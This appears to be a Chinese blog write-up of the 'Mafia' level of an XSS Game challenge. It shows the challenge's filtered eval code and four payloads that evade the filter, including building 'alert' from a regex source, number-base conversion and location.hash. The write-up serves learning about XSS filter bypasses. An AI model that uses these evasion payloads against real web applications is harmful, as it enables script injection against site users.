Mafia

已于 2024-08-17 22:38:42 修改
阅读量477 收藏 3
点赞数 4
分类专栏: XSS Game 文章标签: javascript 前端 开发语言
于 2024-08-17 22:36:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/thewei666/article/details/141288225
版权

目录

一、题目

二、思考

三、payload

3.1 方案一

3.2 方案二

3.3 方案三

3.4 方案四

 四、思考与总结

一、题目

/* Challenge */
mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)

二、思考

正则表达式对`;"+-!\[]符号进行了过滤,并把alert这个函数也过滤了。

思路一:首先考虑的是否拥有alert相似函数,可以使用prompt函数和confirm函数。它们都可以弹出对话框以造成差不多的作用

思路二:使用Funciton构造函数,配合正则表达式以及source属性将正则转换成字符串后,使用toLowerCase方法转小写,即可绕过alert的过滤

思路三:利用进制转换来绕过函数名的过滤

思路四:利用localtionn.hash来绕过

三、payload

3.1 方案一

prompt(1337);
confirm(1337);

3.2 方案二

Function(/ALERT(1337)/.source.toLowerCase())()

3.3 方案三

eval(8680439..toString(30))(1337)

3.4 方案四

eval(location.hash.slice(1))#alert(1)

 四、思考与总结

正则对于函数名进行过滤,绕过该WAF一共使用了三种方法,分别为

  1. 正则表达式的source属性与toLowerCase搭配绕过
  2. parseInt与toString转进制绕过
  3. location.hash绕过

使用source与toLowerCase来进行绕过,只能针对过滤函数名为全小写的情况,当函数名中即拥有小写字母也拥有大写字母时,作用不会太大。因此相比较之下方法二与方法三的使用范围会大些。

魏大橙
关注
专栏目录
mAFiA
生物信息学
07-16 393
这里我们提供了一个运行mAFiA的简要指南,以X染色体为例。
Python-OpenMafia开源Mafia游戏引擎
08-10
**Python-OpenMafia开源Mafia游戏引擎** Python-OpenMafia是一款基于Python语言开发的开源游戏引擎,专为创建Mafia(也称为狼人杀)类型的游戏而设计。Mafia游戏是一种策略和推理相结合的社交游戏,通常由多个玩家...
Denouncing Mafia
青烟绕指柔的博客
05-22 342
题目链接:Denouncing Mafia 画画图我们就可以发现,每次最优肯定是选最长的链,然后算上这条链对其他链的影响,然后再选最长的链,然后做k次。 然后我们可以发现,这就是一个长链剖分,选K条最长链。 AC代码: #pragma GCC optimize("-Ofast","-funroll-all-loops") #include<bits/stdc++.h> //#define int long long using namespace std; const int N=1e5+1
B. Sport Mafia
qq_44134712的博客
07-22 156
B. Sport Mafia time limit per test 2 seconds memory limit per test 256 megabytes input standard input output standard output Each evening after the dinner the SIS's students gather together t...
A. Mafia
Luoriliming的博客
01-16 265
链接:https://codeforces.com/problemset/problem/348/A One daynfriends gathered together to play "Mafia". During each round of the game some player must be the supervisor and othern - 1people take par...
C - Mafia
lml11111的博客
03-18 522
Description One day n friends gathered together to play "Mafia". During each round of the game some player must be the supervisor and other n - 1people take part in the game. For each person we k
MAFIA 算法解析
weixin_34167043的博客
01-16 733
先占个坑。 转载于:https://www.cnblogs.com/zhangyuren/p/8295845.html
Haskell Mafia 项目教程
gitblog_00040的博客
08-30 412
Haskell Mafia 项目教程 mafiaProvides protection against cabal swindling, robbing, injuring or sabotaging people with chopsticks.项目地址:https://gitcode.com/gh_mirrors/ma/mafia 1. 项目的目录结构及介绍 haskell-mafia/ ├...
codeforces Mafia
weixin_33937913的博客
10-12 136
/* * Mafia.cpp * * Created on: 2013-10-12 * Author: wangzhu */ /** * 每个人都想玩若干场,求至少需要玩几场才可以满足大家的需求。 * 结果必然在某个人想玩的次数nmax(此人想玩的是最多的)与所有人想玩的次数和sum之间, * 故二分,left = nmax,right = s...
1163: [Baltic2008]Mafia
Tgotp的博客
02-28 242
扫了一眼题,看到数据范围200,理所当然想到了网络流...一开始看题以为是费用流...但是仔细一想并不能用费用流,应该是个最小割.考虑把每个点拆成两个点即x ,x`,那么在x -&gt; x`连一个容量为 wi的边,代表经过这个点以后最多花费只能是wi对于一个边u,v,把u` 连一个容量为inf的边到v,跑一边最大流即可.c++代码如下:#include&lt;bits/stdc++.h&gt; ...
Storm City Mafia-crx插件
04-06
语言:English,Ελληνικά Storm City黑手党特色:•令人敬畏的图形•30级•电源UPS </ P> Storm City Mafia特点: •令人敬畏的图形 •30级 •电源UPS
maf.rar_mafia_最大频繁模式
09-20
maf.rar_mafia_最大频繁模式 是一个与数据挖掘和模式发现相关的主题,特别是关于最大频繁模式(Maximum Frequent Patterns, MAF)的算法。在这个压缩包中,包含了一个名为 "maf" 的源代码文件,可能是一个C++实现的...
Mafia Definitive Edition Wallpapers New Tab-crx插件
04-06
语言:English 黑手党最终版游戏的最佳壁纸和个性化新标签主题,为您的浏览器。 黑手党最终版壁纸新标签-由Supertabthemes创建的扩展名该扩展名是为所有黑手党游戏迷创建的。 通过下载,您将获得与《黑手党最终版》...
Mafia City HD Wallpapers Game Theme-crx插件
03-13
包括每个选项卡背景上的游戏黑手党城市的高清壁纸图像。 安装此扩展程序,以在每个新选项卡上获得游戏黑手党城的高清图像! 我们始终会更新图像,因此请随时检查...... ...通过我们的扩展程序,您可以获得:1:高分辨率的...
Echarts 折线图
weixin_44443380的博客
11-08 61
解决方法:设置emphasis.lineStyle和折线图本身lineStyle相同即可。问题:鼠标悬停在折线图上,折线变粗。3、去掉 hover 折线变粗方法。
vue2面试题5|[2024-11-08]
最新发布
m0_49474690的博客
11-08 271
关于vue2API的面试题
每天10个vue面试题(九)
不熬夜的臭宝的博客
11-08 395
一天10个vue面试题喽!
软件测试学习笔记丨Vue常用指令-条件渲染(v-if)
ceshiren_com的博客
11-05 585
v-show只是简单控制dom元素的display属性。v-if通过操纵dom元素来进行切换显示。
上门理发系统的搭建
app830的博客
11-07 341
上门理发系统的搭建涉及多个方面,包括技术架构、功能模块、用户体验以及运营策略等。服务器:部署应用到云服务器(如AWS、阿里云)或本地服务器上,确保系统的稳定性和可扩展性。消息通知:通过短信、邮件或APP推送等方式,向用户发送预约确认、提醒等消息。订单管理:用户可以查看自己的预约订单,包括待付款、已付款、已完成等状态。服务浏览与选择:展示各类理发服务,包括价格、时长、适用人群等信息。在搭建过程中,要确保系统的安全性和稳定性,防止数据泄露和系统崩溃。操作便捷:优化用户操作流程,减少不必要的步骤,提高用户体验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

魏大橙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值